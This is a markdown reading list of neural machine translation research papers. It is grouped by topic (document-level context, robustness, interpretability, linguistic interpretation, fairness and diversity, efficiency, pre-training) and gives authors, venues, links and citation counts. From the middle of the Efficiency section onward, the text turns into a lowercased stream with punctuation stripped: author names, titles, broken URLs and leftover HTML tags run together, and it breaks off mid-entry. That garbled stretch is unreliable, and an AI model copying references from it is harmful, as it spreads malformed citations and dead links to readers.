* Elena Voita, Rico Sennrich, and Ivan Titov. 2019. [Context-Aware Monolingual Repair for Neural Machine Translation](https://arxiv.org/pdf/1909.01383). In *Proceedings of EMNLP 2019*.
* Zhengxin Yang, Jinchao Zhang, Fandong Meng, Shuhao Gu, Yang Feng, and Jie Zhou. 2019. [Enhancing Context Modeling with a Query-Guided Capsule Network for Document-level Translation](https://arxiv.org/abs/1909.00564). In *Proceedings of EMNLP 2019*.
* Xin Tan, Longyin Zhang, Deyi Xiong, and Guodong Zhou. 2019. [Hierarchical Modeling of Global Context for Document-Level Neural Machine Translation](https://www.aclweb.org/anthology/D19-1168). In *Proceedings of EMNLP 2019*.
* Yunsu Kim, Duc Thanh Tran, and Hermann Ney. 2019. [When and Why is Document-level Context Useful in Neural Machine Translation?](https://arxiv.org/abs/1910.00294). In *Proceedings of DiscoMT@EMNLP 2019*.
* Zuchao Li, Rui Wang, Kehai Chen, Masao Utiyama, Eiichiro Sumita, Zhuosheng Zhang, and Hai Zhao. 2020. [Explicit Sentence Compression for Neural Machine Translation](https://arxiv.org/abs/1912.11980). In *Proceedings of AAAI 2020*.
* Bei Li, Hui Liu, Ziyang Wang, Yufan Jiang, Tong Xiao, Jingbo Zhu, Tongran Liu, and Changliang Li. 2020. [Does Multi-Encoder Help? A Case Study on Context-Aware Neural Machine Translation](http://arxiv.org/abs/2005.03393). In *Proceedings of ACL 2020*.
* Xintong Li, Lemao Liu, Rui Wang, Guoping Huang, and Max Meng. 2020. [Regularized Context Gates on Transformer for Machine Translation](https://arxiv.org/abs/1908.11020). In *Proceedings of ACL 2020*.
* Danielle Saunders, Felix Stahlberg, and Bill Byrne. 2020. [Using Context in Neural Machine Translation Training Objectives](https://arxiv.org/abs/2005.01483). In *Proceedings of ACL 2020*.
* Shuming Ma, Dongdong Zhang, and Ming Zhou. 2020. [A Simple and Effective Unified Encoder for Document-Level Machine Translation](https://www.aclweb.org/anthology/2020.acl-main.321). In *Proceedings of ACL 2020*.
* Zaixiang Zheng, Xiang Yue, Shujian Huang, Jiajun Chen, and Alexandra Birch. 2020. [Towards Making the Most of Context in Neural Machine Translation](https://arxiv.org/abs/2002.07982). In *Proceedings of IJCAI 2020*.
* Lei Yu, Laurent Sartran, Wojciech Stokowiec, Wang Ling, Lingpeng Kong, Phil Blunsom, and Chris Dyer. 2020. [Better Document-Level Machine Translation with Bayes' Rule](https://arxiv.org/abs/1910.00553). *Transactions of the Association for Computational Linguistics*.
* Xiaomian Kang, Yang Zhao, Jiajun Zhang, and Chengqing Zong. 2020. [Dynamic Context Selection for Document-level Neural Machine Translation via Reinforcement Learning](https://www.aclweb.org/anthology/2020.emnlp-main.175). In *Proceedings of EMNLP 2020*.
* Pei Zhang, Boxing Chen, Niyu Ge, and Kai Fan. 2020. [Long-Short Term Masking Transformer: A Simple but Effective Baseline for Document-level Neural Machine Translation](https://www.aclweb.org/anthology/2020.emnlp-main.81). In *Proceedings of EMNLP 2020*.
* Domenic Donato, Lei Yu, and Chris Dyer. 2021. [Diverse Pretrained Context Encodings Improve Document Translation](https://aclanthology.org/2021.acl-long.104.pdf). In *Proceedings of ACL 2021*.

<h3 id="robustness">Robustness</h3>

* Yonatan Belinkov and Yonatan Bisk. 2018. [Synthetic and Natural Noise Both Break Neural Machine Translation](https://openreview.net/pdf?id=BJ8vJebC-). In *Proceedings of ICLR 2018*. ([Citation](https://scholar.google.com/scholar?cites=10493132199224079445&as_sdt=2005&sciodt=0,5&hl=en): 33)
* Zhengli Zhao, Dheeru Dua, and Sameer Singh. 2018. [Generating Natural Adversarial Examples](https://openreview.net/pdf?id=H1BLjgZCb). In *Proceedings of ICLR 2018*. ([Citation](https://scholar.google.com/scholar?cites=6487263081764376046&as_sdt=2005&sciodt=0,5&hl=en): 45)
* Yong Cheng, Zhaopeng Tu, Fandong Meng, Junjie Zhai, and Yang Liu. 2018. [Towards Robust Neural Machine Translation](http://aclweb.org/anthology/P18-1163). In *Proceedings of ACL 2018*. ([Citation](https://scholar.google.com/scholar?cites=13572592499424174633&as_sdt=2005&sciodt=0,5&hl=en): 5)
* Marco Tulio Ribeiro, Sameer Singh, and Carlos Guestrin. 2018. [Semantically Equivalent Adversarial Rules for Debugging NLP Models](http://aclweb.org/anthology/P18-1079). In *Proceedings of ACL 2018*. ([Citation](https://scholar.google.com/scholar?cites=3200079019495885814&as_sdt=2005&sciodt=0,5&hl=en): 12)
* Javid Ebrahimi, Daniel Lowd, and Dejing Dou. 2018. [On Adversarial Examples for Character-Level Neural Machine Translation](http://aclweb.org/anthology/C18-1055). In *Proceedings of COLING 2018*.
* Paul Michel and Graham Neubig. 2018. [MTNT: A Testbed for Machine Translation of Noisy Text](http://aclweb.org/anthology/D18-1050). In *Proceedings of EMNLP 2018*.
* Antonios Anastasopoulos, Alison Lui, Toan Nguyen, and David Chiang. 2019. [Neural Machine Translation of Text from Non-Native Speakers](https://arxiv.org/pdf/1808.06267.pdf). In *Proceedings of NAACL 2019*.
* Paul Michel, Xian Li, Graham Neubig, and Juan Miguel Pino. 2019. [On Evaluation of Adversarial Perturbations for Sequence-to-Sequence Models](https://arxiv.org/pdf/1903.06620.pdf). In *Proceedings of NAACL 2019*.
* Vaibhav Vaibhav, Sumeet Singh, Craig Stewart, and Graham Neubig. 2019. [Improving Robustness of Machine Translation with Synthetic Noise](https://arxiv.org/pdf/1902.09508.pdf). In *Proceedings of NAACL 2019*.
* Yong Cheng, Lu Jiang, and Wolfgang Macherey. 2019. [Robust Neural Machine Translation with Doubly Adversarial Inputs](https://arxiv.org/pdf/1906.02443). In *Proceedings of ACL 2019*.
* Hairong Liu, Mingbo Ma, Liang Huang, Hao Xiong, and Zhongjun He. 2019. [Robust Neural Machine Translation with Joint Textual and Phonetic Embedding](https://www.aclweb.org/anthology/P19-1291). In *Proceedings of ACL 2019*.
* Zhouxing Shi, Huan Zhang, Kai-Wei Chang, Minlie Huang, and Cho-Jui Hsieh. 2020. [Robustness Verification for Transformers](https://openreview.net/forum?id=BJxwPJHFwS). In *Proceedings of ICLR 2020*.
* Wei Zou, Shujian Huang, Jun Xie, Xinyu Dai, and Jiajun Chen. 2020. [A Reinforced Generation of Adversarial Examples for Neural Machine Translation](https://arxiv.org/abs/1911.03677). In *Proceedings of ACL 2020*.
* Xing Niu, Prashant Mathur, Georgiana Dinu, and Yaser Al-Onaizan. 2020. [Evaluating Robustness to Input Perturbations for Neural Machine Translation](https://arxiv.org/abs/2005.00580). In *Proceedings of ACL 2020*.
* Dan Hendrycks, Xiaoyuan Liu, Eric Wallace, Adam Dziedzic, Rishabh Krishnan, and Dawn Song. 2020. [Pretrained Transformers Improve Out-of-Distribution Robustness](https://arxiv.org/abs/2004.06100). In *Proceedings of ACL 2020*.
* Yong Cheng, Lu Jiang, Wolfgang Macherey, and Jacob Eisenstein. 2020. [AdvAug: Robust Adversarial Augmentation for Neural Machine Translation](https://www.aclweb.org/anthology/2020.acl-main.529). In *Proceedings of ACL 2020*.
* Eric Wallace, Mitchell Stern, and Dawn Song. 2020. [Imitation Attacks and Defenses for Black-box Machine Translation Systems](https://www.aclweb.org/anthology/2020.emnlp-main.446). In *Proceedings of EMNLP 2020*.
* Denis Emelin, Ivan Titov, and Rico Sennrich. 2020. [Detecting Word Sense Disambiguation Biases in Machine Translation for Model-Agnostic Adversarial Attacks](https://www.aclweb.org/anthology/2020.emnlp-main.616). In *Proceedings of EMNLP 2020*.
* Xinze Zhang, Junzhe Zhang, Zhenhua Chen, and Kun He. 2021. [Crafting Adversarial Examples for Neural Machine Translation](https://aclanthology.org/2021.acl-long.153.pdf). In *Proceedings of ACL 2021*.

<h3 id="interpretability">Interpretability</h3>

* Yanzhuo Ding, Yang Liu, Huanbo Luan, and Maosong Sun. 2017. [Visualizing and Understanding Neural Machine Translation](http://aclweb.org/anthology/P17-1106). In *Proceedings of ACL 2017*. ([Citation](https://scholar.google.com/scholar?cites=6029143337933047130&as_sdt=2005&sciodt=0,5&hl=en): 22)
* Hendrik Strobelt, Sebastian Gehrmann, Michael Behrisch, Adam Perer, Hanspeter Pfister, and Alexander M. Rush. 2018. [Seq2Seq-Vis: A Visual Debugging Tool for Sequence-to-Sequence Models](https://arxiv.org/pdf/1804.09299.pdf). In *Proceedings of VAST 2018* and *Proceedings of EMNLP-BlackBox 2018*. ([Citation](https://scholar.google.com/scholar?cites=8924303979242528991&as_sdt=2005&sciodt=0,5&hl=en): 6)
* Alessandro Raganato and Jörg Tiedemann. 2018. [An Analysis of Encoder Representations in Transformer-Based Machine Translation](http://aclweb.org/anthology/W18-5431). In *Proceedings of EMNLP-BlackBox 2018*.
* Felix Stahlberg, Danielle Saunders, and Bill Byrne. 2018. [An Operation Sequence Model for Explainable Neural Machine Translation](http://aclweb.org/anthology/W18-5420). In *Proceedings of EMNLP-BlackBox 2018*.
* Fahim Dalvi, Nadir Durrani, Hassan Sajjad, Yonatan Belinkov, D. Anthony Bau, and James Glass. 2019. [What Is One Grain of Sand in the Desert? Analyzing Individual Neurons in Deep NLP Models](http://people.csail.mit.edu/belinkov/assets/pdf/aaai2019.pdf). In *Proceedings of AAAI 2019*. ([Citation](https://scholar.google.com/scholar?cites=9612190838970536755&as_sdt=2005&sciodt=0,5&hl=en): 2)
* Anthony Bau, Yonatan Belinkov, Hassan Sajjad, Nadir Durrani, Fahim Dalvi, and James Glass. 2019. [Identifying and Controlling Important Neurons in Neural Machine Translation](https://openreview.net/pdf?id=H1z-PsR5KX). In *Proceedings of ICLR 2019*. ([Citation](https://scholar.google.com/scholar?cites=10670221460130643181&as_sdt=2005&sciodt=0,5&hl=en): 2)
* Yonatan Belinkov and James Glass. 2019. [Analysis Methods in Neural Language Processing: A Survey](https://www.aclweb.org/anthology/Q19-1004). *Transactions of the Association for Computational Linguistics*.
* Sofia Serrano and Noah A. Smith. 2019. [Is Attention Interpretable?](https://arxiv.org/pdf/1906.03731). In *Proceedings of ACL 2019*.
* Elena Voita, David Talbot, Fedor Moiseev, Rico Sennrich, and Ivan Titov. 2019. [Analyzing Multi-Head Self-Attention: Specialized Heads Do the Heavy Lifting, the Rest Can Be Pruned](https://arxiv.org/pdf/1905.09418). In *Proceedings of ACL 2019*.
* Joris Baan, Jana Leible, Mitja Nikolaus, David Rau, Dennis Ulmer, Tim Baumgärtner, Dieuwke Hupkes, and Elia Bruni. 2019. [On the Realization of Compositionality in Neural Networks](https://arxiv.org/pdf/1906.01634). In *Proceedings of ACL 2019*.
* Jesse Vig and Yonatan Belinkov. 2019. [Analyzing the Structure of Attention in a Transformer Language Model](https://arxiv.org/pdf/1906.04284). In *Proceedings of ACL 2019*.
* Baosong Yang, Longyue Wang, Derek F. Wong, Lidia S. Chao, and Zhaopeng Tu. 2019. [Assessing the Ability of Self-Attention Networks to Learn Word Order](https://arxiv.org/pdf/1906.00592). In *Proceedings of ACL 2019*.
* Xintong Li, Guanlin Li, Lemao Liu, Max Meng, and Shuming Shi. 2019. [On the Word Alignment from Neural Machine Translation](https://www.aclweb.org/anthology/P19-1124). In *Proceedings of ACL 2019*.
* Elena Voita, Rico Sennrich, and Ivan Titov. 2019. [The Bottom-up Evolution of Representations in the Transformer: A Study with Machine Translation and Language Modeling Objectives](https://arxiv.org/pdf/1909.01380). In *Proceedings of EMNLP 2019*.
* Shilin He, Zhaopeng Tu, Xing Wang, Longyue Wang, Michael R. Lyu, and Shuming Shi. 2019. [Towards Understanding Neural Machine Translation with Word Importance](https://arxiv.org/pdf/1909.00326). In *Proceedings of EMNLP 2019*.
* Felix Stahlberg and Bill Byrne. 2019. [On NMT Search Errors and Model Errors: Cat Got Your Tongue?](https://arxiv.org/pdf/1908.10090). In *Proceedings of EMNLP 2019*.
* Gino Brunner, Yang Liu, Damian Pascual, Oliver Richter, Massimiliano Ciaramita, and Roger Wattenhofer. 2020. [On Identifiability in Transformers](https://openreview.net/forum?id=BJg1f6EFDB). In *Proceedings of ICLR 2020*.
* Chulhee Yun, Srinadh Bhojanapalli, Ankit Singh Rawat, Sashank Reddi, and Sanjiv Kumar. 2020. [Are Transformers Universal Approximators of Sequence-to-Sequence Functions?](https://openreview.net/forum?id=ByxRM0Ntvr). In *Proceedings of ICLR 2020*.
* Akash Kumar Mohankumar, Preksha Nema, Sharan Narasimhan, Mitesh M. Khapra, Balaji Vasan Srinivasan, and Balaraman Ravindran. 2020. [Towards Transparent and Explainable Attention Models](https://arxiv.org/abs/2004.14243). In *Proceedings of ACL 2020*.
* Samira Abnar and Willem Zuidema. 2020. [Quantifying Attention Flow in Transformers](https://arxiv.org/abs/2005.00928). In *Proceedings of ACL 2020*.
* Jierui Li, Lemao Liu, Huayang Li, Guanlin Li, Guoping Huang, and Shuming Shi. 2020. [Evaluating Explanation Methods for Neural Machine Translation](https://www.aclweb.org/anthology/2020.acl-main.35). In *Proceedings of ACL 2020*.
* Goro Kobayashi, Tatsuki Kuribayashi, Sho Yokoi, and Kentaro Inui. 2020. [Attention is Not Only a Weight: Analyzing Transformers with Vector Norms](https://www.aclweb.org/anthology/2020.emnlp-main.574). In *Proceedings of EMNLP 2020*.
* Liyuan Liu, Xiaodong Liu, Jianfeng Gao, Weizhu Chen, and Jiawei Han. 2020. [Understanding the Difficulty of Training Transformers](https://www.aclweb.org/anthology/2020.emnlp-main.463). In *Proceedings of EMNLP 2020*.
* Wenxuan Wang and Zhaopeng Tu. 2020. [Rethinking the Value of Transformer Components](https://www.aclweb.org/anthology/2020.coling-main.529.pdf). In *Proceedings of COLING 2020*.
* Elena Voita, Rico Sennrich, and Ivan Titov. 2021. [Analyzing the Source and Target Contributions to Predictions in Neural Machine Translation](https://aclanthology.org/2021.acl-long.91.pdf). In *Proceedings of ACL 2021*.
* Weicheng Ma, Kai Zhang, Renze Lou, and Lili Wang. 2021. [Contributions of Transformer Attention Heads in Multi- and Cross-lingual Tasks](https://aclanthology.org/2021.acl-long.152.pdf). In *Proceedings of ACL 2021*.

<h3 id="linguistic_interpretation">Linguistic Interpretation</h3>

* Felix Hill, Kyunghyun Cho, Sébastien Jean, Coline Devin, and Yoshua Bengio. 2015. [Embedding Word Similarity with Neural Machine Translation](https://arxiv.org/pdf/1412.6448.pdf). In *Proceedings of ICLR 2015*. ([Citation](https://scholar.google.com/scholar?cites=3941248209566557946&as_sdt=2005&sciodt=0,5&hl=en): 24)
* Xing Shi, Inkit Padhi, and Kevin Knight. 2016. [Does String-Based Neural MT Learn Source Syntax?](http://aclweb.org/anthology/D16-1159). In *Proceedings of EMNLP 2016*. ([Citation](https://scholar.google.com/scholar?oi=bibs&hl=en&cites=13782051589621719871): 57)
* Yonatan Belinkov, Nadir Durrani, Fahim Dalvi, Hassan Sajjad, and James Glass. 2017. [What do Neural Machine Translation Models Learn about Morphology?](http://aclweb.org/anthology/P17-1080). In *Proceedings of ACL 2017*. ([Citation](https://scholar.google.com/scholar?cites=3142186338143493642&as_sdt=2005&sciodt=0,5&hl=en): 50)
* Ella Rabinovich, Noam Ordan, and Shuly Wintner. 2017. [Found in Translation: Reconstructing Phylogenetic Language Trees from Translations](http://aclweb.org/anthology/P17-1049). In *Proceedings of ACL 2017*. ([Citation](https://scholar.google.com/scholar?cites=10035323574777301594&as_sdt=2005&sciodt=0,5&hl=en): 6)
* Rico Sennrich. 2017. [How Grammatical is Character-level Neural Machine Translation? Assessing MT Quality with Contrastive Translation Pairs](http://aclweb.org/anthology/E17-2060). In *Proceedings of EACL 2017*. ([Citation](https://scholar.google.com/scholar?cites=14294900718072928557&as_sdt=2005&sciodt=0,5&hl=en): 25)
* Adam Poliak, Yonatan Belinkov, James Glass, and Benjamin Van Durme. 2018. [On the Evaluation of Semantic Phenomena in Neural Machine Translation Using Natural Language Inference](http://aclweb.org/anthology/N18-2082). In *Proceedings of NAACL 2018*. ([Citation](https://scholar.google.com/scholar?cites=9402109271974711503&as_sdt=2005&sciodt=0,5&hl=en): 5)
* Arianna Bisazza and Clara Tump. 2018. [The Lazy Encoder: A Fine-Grained Analysis of the Role of Morphology in Neural Machine Translation](http://aclweb.org/anthology/D18-1313). In *Proceedings of EMNLP 2018*.
* Lijun Wu, Xu Tan, Di He, Fei Tian, Tao Qin, Jianhuang Lai, and Tie-Yan Liu. 2018. [Beyond Error Propagation in Neural Machine Translation: Characteristics of Language Also Matter](http://aclweb.org/anthology/D18-1396). In *Proceedings of EMNLP 2018*. ([Citation](https://scholar.google.com/scholar?cites=1081737155461853408&as_sdt=2005&sciodt=0,5&hl=en): 4)
* Gongbo Tang, Rico Sennrich, and Joakim Nivre. 2019. [Encoders Help You Disambiguate Word Senses in Neural Machine Translation](https://arxiv.org/pdf/1908.11771). In *Proceedings of EMNLP 2019*.
* Parker Riley, Isaac Caswell, Markus Freitag, and David Grangier. 2020. [Translationese as a Language in Multilingual NMT](https://arxiv.org/abs/1911.03823). In *Proceedings of ACL 2020*.
* Emanuele Bugliarello, Sabrina J. Mielke, Antonios Anastasopoulos, Ryan Cotterell, and Naoaki Okazaki. 2020. [It's Easier to Translate out of English than into it: Measuring Neural Translation Difficulty by Cross-Mutual Information](http://arxiv.org/abs/2005.02354). In *Proceedings of ACL 2020*.

<h3 id="fairness_and_diversity">Fairness and Diversity</h3>

* Hayahide Yamagishi, Shin Kanouchi, Takayuki Sato, and Mamoru Komachi. 2016. [Controlling the Voice of a Sentence in Japanese-to-English Neural Machine Translation](http://www.aclweb.org/anthology/W16-4620). In *Proceedings of the 3rd Workshop on Asian Translation*. ([Citation](https://scholar.google.com/scholar?cites=3457358295141990828&as_sdt=2005&sciodt=0,5&hl=en): 11)
* Rico Sennrich, Barry Haddow, and Alexandra Birch. 2016. [Controlling Politeness in Neural Machine Translation via Side Constraints](http://aclweb.org/anthology/N16-1005). In *Proceedings of NAACL 2016*. ([Citation](https://scholar.google.com/scholar?cites=13603295392629577946&as_sdt=2005&sciodt=0,5&hl=en): 49)
* Xing Niu, Marianna Martindale, and Marine Carpuat. 2017. [A Study of Style in Machine Translation: Controlling the Formality of Machine Translation Output](http://aclweb.org/anthology/D17-1299). In *Proceedings of EMNLP 2017*. ([Citation](https://scholar.google.com/scholar?cites=1203074987073423616&as_sdt=2005&sciodt=0,5&hl=en): 8)
* Ella Rabinovich, Raj Nath Patel, Shachar Mirkin, Lucia Specia, and Shuly Wintner. 2017. [Personalized Machine Translation: Preserving Original Author Traits](http://aclweb.org/anthology/E17-1101). In *Proceedings of EACL 2017*. ([Citation](https://scholar.google.com/scholar?cites=6856955572531425903&as_sdt=2005&sciodt=0,5&hl=en): 10)
* Myle Ott, Michael Auli, David Grangier, and Marc'Aurelio Ranzato. 2018. [Analyzing Uncertainty in Neural Machine Translation](https://arxiv.org/pdf/1803.00047). In *Proceedings of ICML 2018*. ([Citation](https://scholar.google.com/scholar?cites=1522001537063991105&as_sdt=2005&sciodt=0,5&hl=en): 11)
* Paul Michel and Graham Neubig. 2018. [Extreme Adaptation for Personalized Neural Machine Translation](http://www.aclweb.org/anthology/P18-2050). In *Proceedings of ACL 2018*. ([Citation](https://scholar.google.com/scholar?cites=16717798879574507487&as_sdt=2005&sciodt=0,5&hl=en): 6)
* Eva Vanmassenhove, Christian Hardmeier, and Andy Way. 2018. [Getting Gender Right in Neural Machine Translation](http://www.aclweb.org/anthology/D18-1334). In *Proceedings of EMNLP 2018*.
* Ashwin Kalyan, Peter Anderson, Stefan Lee, and Dhruv Batra. 2019. [Trainable Decoding of Sets of Sequences for Neural Sequence Models](http://proceedings.mlr.press/v97/kalyan19a/kalyan19a.pdf). In *Proceedings of ICML 2019*.
* Tianxiao Shen, Myle Ott, Michael Auli, and Marc'Aurelio Ranzato. 2019. [Mixture Models for Diverse Machine Translation: Tricks of the Trade](http://proceedings.mlr.press/v97/shen19c/shen19c.pdf). In *Proceedings of ICML 2019*.
* Wouter Kool, Herke van Hoof, and Max Welling. 2019. [Stochastic Beams and Where to Find Them: The Gumbel-Top-k Trick for Sampling Sequences Without Replacement](http://proceedings.mlr.press/v97/kool19a/kool19a.pdf). In *Proceedings of ICML 2019*.
* Won Ik Cho, Ji Won Kim, Seok Min Kim, and Nam Soo Kim. 2019. [On Measuring Gender Bias in Translation of Gender-Neutral Pronouns](https://arxiv.org/pdf/1905.11684). In *Proceedings of ACL 2019*.
* Gabriel Stanovsky, Noah A. Smith, and Luke Zettlemoyer. 2019. [Evaluating Gender Bias in Machine Translation](https://arxiv.org/pdf/1906.00591). In *Proceedings of ACL 2019*.
* Keita Kurita, Nidhi Vyas, Ayush Pareek, Alan W. Black, and Yulia Tsvetkov. 2019. [Measuring Bias in Contextualized Word Representations](https://arxiv.org/pdf/1906.07337). In *Proceedings of ACL 2019*.
* Raphael Shu, Hideki Nakayama, and Kyunghyun Cho. 2019. [Generating Diverse Translations with Sentence Codes](https://www.aclweb.org/anthology/P19-1177). In *Proceedings of ACL 2019*.
* Daphne Ippolito, Reno Kriz, Joao Sedoc, Maria Kustikova, and Chris Callison-Burch. 2019. [Comparison of Diverse Decoding Methods from Conditional Language Models](https://www.aclweb.org/anthology/P19-1365). In *Proceedings of ACL 2019*.
* Xing Niu and Marine Carpuat. 2020. [Controlling Neural Machine Translation Formality with Synthetic Supervision](https://arxiv.org/abs/1911.08706). In *Proceedings of AAAI 2020*.
* Zewei Sun, Shujian Huang, Hao-Ran Wei, Xin-Yu Dai, and Jiajun Chen. 2020. [Generating Diverse Translation by Manipulating Multi-Head Attention](https://arxiv.org/pdf/1911.09333). In *Proceedings of AAAI 2020*.
* Shuo Wang, Zhaopeng Tu, Shuming Shi, and Yang Liu. 2020. [On the Inference Calibration of Neural Machine Translation](https://arxiv.org/abs/2005.00963). In *Proceedings of ACL 2020*.
* Danielle Saunders and Bill Byrne. 2020. [Reducing Gender Bias in Neural Machine Translation as a Domain Adaptation Problem](http://arxiv.org/abs/2004.04498). In *Proceedings of ACL 2020*.
* Dirk Hovy, Federico Bianchi, and Tommaso Fornaciari. 2020. [You Sound Just Like Your Father: Commercial Machine Translation Systems Include Stylistic Biases](https://www.aclweb.org/anthology/2020.acl-main.154). In *Proceedings of ACL 2020*.
* Luisa Bentivogli, Beatrice Savoldi, Matteo Negri, Mattia A. Di Gangi, Roldano Cattoni, and Marco Turchi. 2020. [Gender in Danger? Evaluating Speech Translation Technology on the MuST-SHE Corpus](https://www.aclweb.org/anthology/2020.acl-main.619). In *Proceedings of ACL 2020*.
* Sorami Hisamoto, Matt Post, and Kevin Duh. 2020. [Membership Inference Attacks on Sequence-to-Sequence Models: Is My Data in Your Machine Translation System?](https://transacl.org/ojs/index.php/tacl/article/view/1779). *Transactions of the Association for Computational Linguistics*.
* Huda Khayrallah, Brian Thompson, Matt Post, and Philipp Koehn. 2020. [Simulated Multiple Reference Training Improves Low-Resource Machine Translation](https://www.aclweb.org/anthology/2020.emnlp-main.7). In *Proceedings of EMNLP 2020*.
* Xuanfu Wu, Yang Feng, and Chenze Shao. 2020. [Generating Diverse Translation from Model Distribution with Dropout](https://www.aclweb.org/anthology/2020.emnlp-main.82). In *Proceedings of EMNLP 2020*.

<h3 id="efficiency">Efficiency</h3>

* Abigail See, Minh-Thang Luong, and Christopher D. Manning. 2016. [Compression of Neural Machine Translation Models via Pruning](http://aclweb.org/anthology/K16-1029). In *Proceedings of CoNLL 2016*. ([Citation](https://scholar.google.com.hk/scholar?cites=13072353668416361496&as_sdt=2005&sciodt=0,5&hl=en): 33)
* Yusuke Oda, Philip Arthur, Graham Neubig, Koichiro Yoshino, and Satoshi Nakamura. 2017. [Neural Machine Translation via Binary Code Prediction](http://aclweb.org/anthology/P17-1079). In *Proceedings of ACL 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=9954145361647418034&as_sdt=2005&sciodt=0,5&hl=en): 3)
* Xing Shi and Kevin Knight. 2017. [Speeding Up Neural Machine Translation Decoding by Shrinking Run-time Vocabulary](http://aclweb.org/anthology/P17-2091). In *Proceedings of ACL 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=7302197227417767855&as_sdt=2005&sciodt=0,5&hl=en): 5)
* Ofir Press and Lior Wolf. 2017. [Using the Output Embedding to Improve Language Models](http://aclweb.org/anthology/E17-2025). In *Proceedings of EACL 2017*. ([Citation](https://scholar.google.com/scholar?um=1&ie=UTF-8&lr&cites=3142797974561089298): 126)
* Xiaowei Zhang, Wei Chen, Feng Wang, Shuang Xu, and Bo Xu. 2017. [Towards Compact and Fast Neural Machine Translation Using a Combined Method](http://aclweb.org/anthology/D17-1154). In *Proceedings of EMNLP 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=832815405370901340&as_sdt=2005&sciodt=0,5&hl=en): 5)
* Felix Stahlberg and Bill Byrne. 2017. [Unfolding and Shrinking Neural Machine Translation Ensembles](http://aclweb.org/anthology/D17-1208). In *Proceedings of EMNLP 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=14880262780099335970&as_sdt=2005&sciodt=0,5&hl=en): 5)
* Jacob Devlin. 2017. [Sharp Models on Dull Hardware: Fast and Accurate Neural Machine Translation Decoding on the CPU](http://aclweb.org/anthology/D17-1300). In *Proceedings of EMNLP 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=17103371978045782164&as_sdt=2005&sciodt=0,5&hl=en): 8)
* Dakun Zhang, Jungi Kim, Josep Crego, and Jean Senellart. 2017. [Boosting Neural Machine Translation](http://aclweb.org/anthology/I17-2046). In *Proceedings of IJCNLP 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=10941157301841399344&as_sdt=2005&sciodt=0,5&hl=en): 3)
* Łukasz Kaiser, Aurko Roy, Ashish Vaswani, Niki Parmar, Samy Bengio, Jakob Uszkoreit, and Noam Shazeer. 2018. [Fast Decoding in Sequence Models Using Discrete Latent Variables](https://arxiv.org/pdf/1803.03382.pdf). In *Proceedings of ICML 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=4042994175439965815&as_sdt=2005&sciodt=0,5&hl=en): 3)
gonzalo iglesias william tambellini adri de gispert eva hasler and bill byrne 2018 accelerating nmt batched beam decoding with lmbr posteriors for deployment http aclweb org anthology n18 3013 in proceedings of naacl 2018 jerry quinn and miguel ballesteros 2018 pieces of eight 8 bit neural machine translation http aclweb org anthology n18 3014 in proceedings of naacl 2018 matt post and david vilar 2018 fast lexically constrained decoding with dynamic beam allocation for neural machine translation http aclweb org anthology n18 1119 in proceedings of naacl 2018 citation https scholar google com scholar cites 3504623917475500888 as sdt 2005 sciodt 0 5 hl en 6 biao zhang deyi xiong and jinsong su 2018 accelerating neural transformer via an average attention network http aclweb org anthology p18 1166 in proceedings of acl 2018 citation https scholar google com scholar cites 16436039193082710776 as sdt 2005 sciodt 0 5 hl en 5 rui wang masao utiyama and eiichiro sumita 2018 dynamic sentence sampling for efficient training of neural machine translation http aclweb org anthology p18 2048 in proceedings of acl 2018 citation https scholar google com hk scholar cites 867223386840543463 as sdt 2005 sciodt 0 5 hl en 2 myle ott sergey edunov david grangier and michael auli 2018 scaling neural machine translation http aclweb org anthology w18 6301 in proceedings of the third conference on machine translation research papers joern wuebker patrick simianer and john denero 2018 compact personalized models for neural machine translation http aclweb org anthology d18 1104 in proceedings of emnlp 2018 wen zhang liang huang yang feng lei shen and qun liu 2018 speeding up neural machine translation decoding by cube pruning http aclweb org anthology d18 1460 in proceedings of emnlp 2018 zhisong zhang rui wang masao utiyama eiichiro sumita and hai zhao 2018 exploring recombination for efficient decoding of neural machine translation http aclweb org anthology d18 1511 in proceedings of emnlp 
2018 nikolay bogoychev kenneth heafield alham fikri aji and marcin junczys dowmunt 2018 accelerating asynchronous stochastic gradient descent for neural machine translation http aclweb org anthology d18 1332 in proceedings of emnlp 2018 citation https scholar google com hk scholar cites 12306021941401324130 as sdt 2005 sciodt 0 5 hl en 2 mitchell stern noam shazeer and jakob uszkoreit 2018 blockwise parallel decoding for deep autoregressive models https papers nips cc paper 8212 blockwise parallel decoding for deep autoregressive models pdf in proceedings of neurips 2018 zhanghao wu zhijian liu ji lin yujun lin song han 2020 efficient transformer for mobile applications https openreview net forum id byemplhkph in proceedings of iclr 2020 christopher brix parnia bahar and hermann ney 2020 successfully applying the stabilized lottery ticket hypothesis to the transformer architecture https arxiv org abs 2005 03454 in proceedings of acl 2020 hanrui wang zhanghao wu zhijian liu han cai ligeng zhu chuang gan and song han 2020 hat hardware aware transformers for efficient natural language processing https arxiv org abs 2005 14187 in proceedings of acl 2020 zhuohan li eric wallace sheng shen kevin lin kurt keutzer dan klein joseph e gonzalez 2020 train large then compress rethinking model size for efficient training and inference of transformers https arxiv org abs 2002 11794 in proceedings of icml 2020 maximiliana behnke kenneth heafield 2020 losing heads in the lottery pruning transformer attention in neural machine translation https www aclweb org anthology 2020 emnlp main 211 in proceedings of emnlp 2020 minjia zhang yuxiong he 2020 accelerating training of transformer based language models with progressive layer dropping https papers nips cc paper 2020 file a1140a3d0df1c81e24ae954d935e8926 paper pdf in proceedings of neurips 2020 yimeng wu peyman passban mehdi rezagholizadeh qun liu 2020 why skip if you can combine a simple knowledge distillation technique for 
intermediate layers https www aclweb org anthology 2020 emnlp main 74 in proceedings of emnlp 2020 h3 id pre training pre training h3 bryan mccann james bradbury caiming xiong and richard socher 2017 learned in translation contextualized word vectors http papers nips cc paper 7209 learned in translation contextualized word vectors pdf in proceedings of nips 2017 citation https scholar google com hk scholar cites 12356231721397988330 as sdt 2005 sciodt 0 5 hl en 136 ye qi devendra sachan matthieu felix sarguna padmanabhan and graham neubig 2018 when and why are pre trained word embeddings useful for neural machine translation http aclweb org anthology n18 2084 in proceedings of naacl 2018 citation https scholar google com hk scholar cites 6166308028416584239 as sdt 2005 sciodt 0 5 hl en 19 matthew peters mark neumann mohit iyyer matt gardner christopher clark kenton lee and luke zettlemoyer 2018 deep contextualized word representations http 